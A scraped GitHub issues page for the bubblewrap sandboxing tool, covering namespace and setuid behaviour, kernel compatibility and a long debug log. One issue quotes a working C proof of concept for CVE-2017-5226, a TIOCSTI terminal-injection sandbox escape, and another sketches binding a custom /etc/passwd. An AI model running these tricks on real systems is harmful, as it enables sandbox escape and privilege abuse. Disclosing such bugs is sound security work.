containers / bubblewrap Goto Github PK
View Code? Open in Web Editor NEWLow-level unprivileged sandboxing tool used by Flatpak and similar projects
License: Other
Low-level unprivileged sandboxing tool used by Flatpak and similar projects
License: Other
version 0.1.6 produces the following error message:
./bwrap --bind / / --proc /proc --dev /dev bash
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
Everything still appears to work.
Tested on debian (nosuid) and arch (with and without suid)
In our Endless image builder, we chroot into the ostree deployment to install apps with flatpak. The triggers always fail for 2 reasons:
The slave mounting of / fails because the deployment directory is not actually a mountpoint. This is easily fixed by doing a bind mount before hand, but I think this can be done in bubblewrap, too. Systemd does this - https://github.com/systemd/systemd/blob/master/src/core/namespace.c#L910.
pivot_root fails with EINVAL for reasons I can't quite grok. See https://github.com/torvalds/linux/blob/master/fs/namespace.c#L3035. FWIW, I can't really see why the pivot_root is needed. It seems that you could just build up the newroot, then move the mount over /. This is also what systemd does. It used to use pivot_root, but changed that in systemd/systemd@ac0930c.
From the manpage
By default, bwrap creates a new user namespace for the sandbox.
But it doesn't!
If --unshare-user is not used, there is no new user namespace if bubblewrap is used with suid permissions.
running on a system with unprivileged user namespaces available: (without suid)
bwrap --ro-bind /usr /usr --symlink usr/lib64 /lib64 --bind /etc /etc --proc /proc --dev /dev bash
ls -l shows:
drwxr-xr-x 4 myuser myuser 300 Jan 7 13:37 dev
drwxr-xr-x 74 nobody nobody 4096 Jan 7 13:09 etc
lrwxrwxrwx 1 myuser myuser 9 Jan 7 13:37 lib64 -> usr/lib64
dr-xr-xr-x 187 nobody nobody 0 Jan 7 12:32 proc
drwxr-xr-x 8 nobody nobody 4096 Dec 10 13:22 usr
running with suid permissions:
bwrap --ro-bind /usr /usr --symlink usr/lib64 /lib64 --bind /etc /etc --proc /proc --dev /dev bash
ls -l shows:
drwxr-xr-x 4 myuser myuser 300 Jan 7 11:43 dev
drwxr-xr-x 74 root root 4096 Jan 7 11:36 etc
lrwxrwxrwx 1 myuser myuser 9 Jan 7 11:43 lib64 -> usr/lib64
dr-xr-xr-x 187 root root 0 Jan 7 11:11 proc
drwxr-xr-x 8 root root 4096 Dec 10 13:22 usr
This is by default inside a mount namespace, but not inside a user namespace
https://github.com/projectatomic/bubblewrap/blob/master/bubblewrap.c#L1636
being able to override root owned files inside a mount namespace but with the real user namespace might create unexpected security issues
bwrap --ro-bind /usr /usr --symlink usr/lib64 /lib64 --bind /etc /etc --bind /tmp/mypasswd /etc/passwd --proc /proc --dev /dev bash
so now we have an environment inside a mount namespace but in the real user namespace, with a user specified passwd file
since / is mounted nosuid, that does not allow root by simply running 'su' after changing passwd
But there are files that include permission rules to restrict the user, so exploiting this should be possible.
Some more thoughts:
Are namespaces supposed to be used by normal users outside a (unprivileged) user namespace?
They were probably not designed to be used with suid.
also:
running 'mkdir /test' will create a user owned directory in /
drwx------ 2 myuser myuser 40 Jan 7 11:46 test
Why is / owned by the user and not by root?
Shouldn't the permissions be the same as on the original system?
The same goes for files included with --bind
User namespaces or not, being able to do --bind /tmp/myfile /etc/passwd is scary.
Maybe binded files should have the same permissions as the target directory
mounting a tmpfs on root owned files seems fine, assuming the permissions don't change (mounting a tmpfs on /etc should result in an empty /etc directory owned by root(or rather "nobody"), not by the user)
In some cases, programs vary behavior based on argv[0]
, but we currently do:
if (execvp (argv[0], argv) == -1)
requiring them to be the same. We should add --argv0 /usr/bin/blah
or so.
Right now we have a lot of API surface to create files and such. Are we sure we need an internal tmpfs in order to pivot cleanly? If we assume the host's /tmp
is tmpfs, it seems not so bad to just leak that? Maybe....or maybe we change systemd to mount /run/user/$uid/tmpfs as a separate fs by default? (Or use FUSE...)
Actually regarding /tmp, in fact, we should probably use /tmp/containers-XXXXX
for /tmp
in the container so that the host's systemd-tmpfiles cleans it up properly.
Right now on my desktop system i'm in e.g. the mock
group, and that gets propagated into containers that are run.
Dropping groups is an interesting topic (https://lwn.net/Articles/621612/) but honestly I suspect we could just say that if you install this tool, you can't use groups-for-negative-security?
If i do:
bwrap --bind / / --ro-bind /mnt /mnt sh
Then /mnt is readonly, but sub-mounts like /mnt/some-mount are still read-write.
We should have a test suite.
On Debian bug https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702, Federico Bento <[email protected]> writes:
When executing a program via the bubblewrap sandbox, the nonpriv
session can escape to the parent session by using the TIOCSTI ioctl to
push characters into the terminal's input buffer, allowing an attacker
to escape the sandbox.This has been assigned CVE-2017-5226.
$ cat test.c #include <unistd.h> #include <sys/ioctl.h> #include <termios.h> int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); execlp("/bin/id", "id", NULL); } $ gcc test.c -o /tmp/test $ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin /bin --ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test id uid=0 gid=1000 groups=1000 $ id <------ did not type this uid=1000(saken) gid=1000(saken) groups=1000(saken)
I don't know who assigned the CVE ID or whether the bug reporter has made any attempt to report it upstream already.
The change in #143 breaks the use of bwrap for interactive sessions. For instance, if you run bwrap --bind / / sh
, and then press ctrl-Z
the "outer" shell gets unfrozen, but the "inner" shell doesn't get frozen, and both try to read terminal input at the same time.
[centos@localhost ~]$ bwrap --unshare-user-try --ro-bind / / /bin/true
Creating new namespace failed, likely because the kernel does not support user namespaces. bwrap must be installed setuid on such systems.
[centos@localhost ~]$ ls -l /usr/bin/bwrap
-rwsr-xr-x. 1 root root 45432 Sep 23 20:00 /usr/bin/bwrap
[centos@localhost ~]$ uname -a
Linux localhost 3.10.0-327.36.1.el7.x86_64 #1 SMP Sun Sep 18 13:04:29 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
[centos@localhost boot]$ egrep "(NAMESPACES|_NS=)" /boot/config-3.10.0-327.36.1.el7.x86_64
CONFIG_NAMESPACES=y
CONFIG_UTS_NS=y
CONFIG_IPC_NS=y
CONFIG_USER_NS=y
CONFIG_PID_NS=y
CONFIG_NET_NS=y
CONFIG_NF_CONNTRACK_NETBIOS_NS=m
I may be mising something obvious here.
With the default configuration, installing or uninstalling an application with flatpak throws:
# flatpak install gnome-apps org.gnome.iagno
1 delta parts, 1 loose fetched; 432 KiB transferred in 4 seconds
Creating new namespace failed: Invalid argument
Creating new namespace failed: Invalid argument
Creating new namespace failed: Invalid argument
Installing related: org.gnome.iagno.Locale
1 delta parts, 1 loose fetched; 714 KiB transferred in 5 seconds
Turns out that my ARM setup wants the arguments in another order:
$ grep CLONE /boot/config-4.4.11-ntc
CONFIG_CLONE_BACKWARDS=y
It also seems to be the default upstream kernel configuration:
$ grep CLONE_BACKWARDS arch/arm/Kconfig
select CLONE_BACKWARDS
It's the default for:
CRIS and S390 (already handled) uses BACKWARDS2
Microblaze uses BACKWARDS3
I'm guessing the cases in bubblewrap are incomplete, there's 3 here, plus the "normal" case:
#
# ABI hall of shame
#
config CLONE_BACKWARDS
bool
help
Architecture has tls passed as the 4th argument of clone(2),
not the 5th one.
config CLONE_BACKWARDS2
bool
help
Architecture has the first two arguments of clone(2) swapped.
config CLONE_BACKWARDS3
bool
help
Architecture has tls passed as the 3rd argument of clone(2),
not the 5th one.
Swapping the arguments on ARM as on S390 fixed the warnings, though I'm unsure that's the correct fix, as the first few arguments seem correct. Is there not a way to do with going through the glibc instead?
I saw that if a flatpak app somehow triggers another process to be spawned, when it quits, that spawned process can linger around.
That's bad, because if another app runs later, it may find the initial process and pick it up instead of spawning it again, except that the old process may be pointing to paths or state that don't exist anymore.
Discussing this with @matthiasclasen on IRC, we thought that bubblewrap should provide an option to terminate the sandbox also when the PID 2 dies, to prevent this from happening.
Hi,
I'm trying to install a Flatpak app on a distro which predates Flatpak support.
Error message:
Creating new namespace failed, likely because the kernel does not support user namespaces. bwrap must be installed setuid on such systems.
The kernel has got the following:
CONFIG_NAMESPACES=y
CONFIG_UTS_NS=y
CONFIG_IPC_NS=y
CONFIG_PID_NS=y
CONFIG_NET_NS=y
CONFIG_DEVPTS_MULTIPLE_INSTANCES=y
CONFIG_OVERLAYFS_FS=m
(There may be a spelling error in CONFIG_OVERLAYFS_FS in issue #87.)
-rwsr-xr-x 1 root root 164080 Jan 6 04:55 /usr/local/bin/bwrap*
Version is bubblewrap 0.1.5
.
Any suggestions?
Using Qubes Debian jessie
based AppVM with bubblewrap from jessie-backports (version 0.1.4-2~bpo8+1
).
(Neither AppArmor nor grsecurity is being involved.)
Here are instructions on how to reproduce this in Qubes:
QubesOS/qubes-issues#2540
user@host:~/sandbox$ ./sandboxed-tor-browser -debug
2016/12/25 05:35:20 launch: Starting.
2016/12/25 05:35:20 launch: Connecting to the Tor network.
2016/12/25 05:35:20 launch: Starting Tor Browser.
2016/12/25 05:35:20 sandbox: User namespace support detected.
2016/12/25 05:35:20 dynlib: ELF AUXV AT_HWCAP: 0000000000000000
2016/12/25 05:35:20 dynlib: osVersion: 0004041f
2016/12/25 05:35:20 dynlib: debug: Multiple entry: libpng12.so.0: [/lib/x86_64-linux-gnu/libpng12.so.0 /usr/lib/x86_64-linux-gnu/libpng12.so.0]
2016/12/25 05:35:20 dynlib: debug: Multiple entry: libusb-0.1.so.4: [/lib/x86_64-linux-gnu/libusb-0.1.so.4 /usr/lib/x86_64-linux-gnu/libusb-0.1.so.4]
2016/12/25 05:35:20 sandbox: ld.so appears to be '/lib64/ld-linux-x86-64.so.2' -> /lib/x86_64-linux-gnu/ld-2.19.so.
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox imports: [libasan.so.2 libpthread.so.0 libdl.so.2 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: Appending extra libs: [libxcb.so.1 libXau.so.6 libXdmcp.so.6 libadwaita.so libprintbackend-file.so libpixbufloader-png.so]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libfreebl3.so imports: [libnssutil3.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/liblgpllibs.so imports: [libasan.so.2 libpthread.so.0 libdl.so.2 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libmozsqlite3.so imports: [libasan.so.2 libpthread.so.0 libdl.so.2 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnspr4.so imports: [libasan.so.2 libdl.so.2 libpthread.so.0 librt.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnss3.so imports: [libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnssckbi.so imports: [libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnssdbm3.so imports: [libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnssutil3.so imports: [libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libplc4.so imports: [libasan.so.2 libdl.so.2 libnspr4.so libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libplds4.so imports: [libasan.so.2 libdl.so.2 libnspr4.so libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libsmime3.so imports: [libnss3.so libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libsoftokn3.so imports: [libmozsqlite3.so libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libssl3.so imports: [libnss3.so libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libxul.so imports: [libasan.so.2 libpthread.so.0 libdl.so.2 libnss3.so libsmime3.so libssl3.so libnssutil3.so libmozsqlite3.so libplds4.so libplc4.so libnspr4.so liblgpllibs.so libfreetype.so.6 libfontconfig.so.1 librt.so.1 libXrender.so.1 libasound.so.2 libdbus-glib-1.so.2 libdbus-1.so.3 libgobject-2.0.so.0 libglib-2.0.so.0 libgtk-x11-2.0.so.0 libatk-1.0.so.0 libgio-2.0.so.0 libpangoft2-1.0.so.0 libgdk-x11-2.0.so.0 libpangocairo-1.0.so.0 libgdk_pixbuf-2.0.so.0 libpango-1.0.so.0 libcairo.so.2 libX11.so.6 libXext.so.6 libXt.so.6 libgthread-2.0.so.0 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libdl.so.2 imports: [libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libasound.so.2 imports: [libm.so.6 libdl.so.2 libpthread.so.0 librt.so.1 libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgthread-2.0.so.0 imports: [libpthread.so.0 libglib-2.0.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libfontconfig.so.1 imports: [libfreetype.so.6 libexpat.so.1 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libX11.so.6 imports: [libxcb.so.1 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libgcc_s.so.1 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libxcb.so.1 imports: [libXau.so.6 libXdmcp.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXdmcp.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libpango-1.0.so.0 imports: [libgobject-2.0.so.0 libgmodule-2.0.so.0 libgthread-2.0.so.0 libglib-2.0.so.0 libm.so.6 libthai.so.0 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/librt.so.1 imports: [libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 imports: [libglib-2.0.so.0 libffi.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libpangoft2-1.0.so.0 imports: [libpango-1.0.so.0 libgobject-2.0.so.0 libgmodule-2.0.so.0 libgthread-2.0.so.0 libglib-2.0.so.0 libharfbuzz.so.0 libfontconfig.so.1 libfreetype.so.6 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnssutil3.so imports: [libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libdbus-glib-1.so.2 imports: [libdbus-1.so.3 libgio-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libglib-2.0.so.0 imports: [libpcre.so.3 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libcairo.so.2 imports: [libpthread.so.0 libpixman-1.so.0 libfontconfig.so.1 libfreetype.so.6 libpng12.so.0 libxcb-shm.so.0 libxcb-render.so.0 libxcb.so.1 libXrender.so.1 libX11.so.6 libXext.so.6 libz.so.1 librt.so.1 libm.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libpthread.so.0 imports: [libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Tor/libstdc++.so.6 imports: [libm.so.6 libc.so.6 ld-linux-x86-64.so.2 libgcc_s.so.1]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/engines/libadwaita.so imports: [libgtk-x11-2.0.so.0 libatk-1.0.so.0 libgio-2.0.so.0 libpangoft2-1.0.so.0 libfontconfig.so.1 libfreetype.so.6 libgdk-x11-2.0.so.0 libpangocairo-1.0.so.0 libpango-1.0.so.0 libcairo.so.2 libgdk_pixbuf-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libplc4.so imports: [libasan.so.2 libdl.so.2 libnspr4.so libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 imports: [libgobject-2.0.so.0 libgmodule-2.0.so.0 libglib-2.0.so.0 libz.so.1 libselinux.so.1 libresolv.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgdk-x11-2.0.so.0 imports: [libpangocairo-1.0.so.0 libpango-1.0.so.0 libgdk_pixbuf-2.0.so.0 libgio-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libfontconfig.so.1 libfreetype.so.6 libXrender.so.1 libXinerama.so.1 libXi.so.6 libXrandr.so.2 libXcursor.so.1 libXcomposite.so.1 libXdamage.so.1 libXfixes.so.3 libcairo.so.2 libX11.so.6 libXext.so.6 libm.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgdk_pixbuf-2.0.so.0 imports: [libgmodule-2.0.so.0 libgio-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libpng12.so.0 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXext.so.6 imports: [libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXt.so.6 imports: [libSM.so.6 libICE.so.6 libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libc.so.6 imports: [ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXau.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libatk-1.0.so.0 imports: [libgobject-2.0.so.0 libglib-2.0.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so imports: [libgdk_pixbuf-2.0.so.0 libgmodule-2.0.so.0 libgio-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libpng12.so.0 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libplds4.so imports: [libasan.so.2 libdl.so.2 libnspr4.so libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libpangocairo-1.0.so.0 imports: [libpango-1.0.so.0 libgobject-2.0.so.0 libgmodule-2.0.so.0 libgthread-2.0.so.0 libglib-2.0.so.0 libcairo.so.2 libm.so.6 libpangoft2-1.0.so.0 libfontconfig.so.1 libfreetype.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Tor/libasan.so.2 imports: [librt.so.1 libpthread.so.0 libdl.so.2 libstdc++.so.6 libm.so.6 libc.so.6 ld-linux-x86-64.so.2 libgcc_s.so.1]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libm.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/printbackends/libprintbackend-file.so imports: [libgtk-x11-2.0.so.0 libgdk-x11-2.0.so.0 libpangocairo-1.0.so.0 libX11.so.6 libXcomposite.so.1 libXdamage.so.1 libXfixes.so.3 libatk-1.0.so.0 libcairo.so.2 libgdk_pixbuf-2.0.so.0 libgio-2.0.so.0 libpangoft2-1.0.so.0 libpango-1.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libfontconfig.so.1 libfreetype.so.6 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libdbus-1.so.3 imports: [libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0 imports: [libgdk-x11-2.0.so.0 libgmodule-2.0.so.0 libpangocairo-1.0.so.0 libX11.so.6 libXcomposite.so.1 libXdamage.so.1 libXfixes.so.3 libatk-1.0.so.0 libcairo.so.2 libgdk_pixbuf-2.0.so.0 libgio-2.0.so.0 libpangoft2-1.0.so.0 libpango-1.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libfontconfig.so.1 libfreetype.so.6 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnspr4.so imports: [libasan.so.2 libdl.so.2 libpthread.so.0 librt.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libfreetype.so.6 imports: [libz.so.1 libpng12.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXrender.so.1 imports: [libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXdamage.so.1 imports: [libXfixes.so.3 libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXfixes.so.3 imports: [libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 imports: []
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libexpat.so.1 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXi.so.6 imports: [libX11.so.6 libXext.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libxcb-render.so.0 imports: [libxcb.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libresolv.so.2 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXcomposite.so.1 imports: [libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libSM.so.6 imports: [libICE.so.6 libuuid.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libICE.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libpcre.so.3 imports: [libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libpixman-1.so.0 imports: [libm.so.6 libpthread.so.0 libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0 imports: [libxcb.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libpng12.so.0 imports: [libz.so.1 libm.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libz.so.1 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXinerama.so.1 imports: [libX11.so.6 libXext.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXcursor.so.1 imports: [libXrender.so.1 libXfixes.so.3 libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgmodule-2.0.so.0 imports: [libdl.so.2 libglib-2.0.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libthai.so.0 imports: [libdatrie.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libharfbuzz.so.0 imports: [libglib-2.0.so.0 libfreetype.so.6 libgraphite2.so.3 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libffi.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libselinux.so.1 imports: [libpcre.so.3 libdl.so.2 libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXrandr.so.2 imports: [libXext.so.6 libXrender.so.1 libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libuuid.so.1 imports: [libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libdatrie.so.1 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgraphite2.so.3 imports: [libc.so.6]
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libc-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libdbus-1.so.3.8.13
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libdl-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libexpat.so.1.6.0
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libgcc_s.so.1
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libglib-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libm-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libpcre.so.3.13.1
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libpng12.so.0.50.0
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libpthread-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libresolv-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/librt-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libselinux.so.1
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libuuid.so.1.3.0
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libz.so.1.2.8
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libICE.so.6.3.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libSM.so.6.0.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXcomposite.so.1.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXcursor.so.1.0.2
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXdamage.so.1.1.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXfixes.so.3.1.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXi.so.6.1.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXrandr.so.2.2.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXrender.so.1.3.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXt.so.6.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libasound.so.2.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libatk-1.0.so.0.21409.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libcairo.so.2.11400.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libdatrie.so.1.3.1
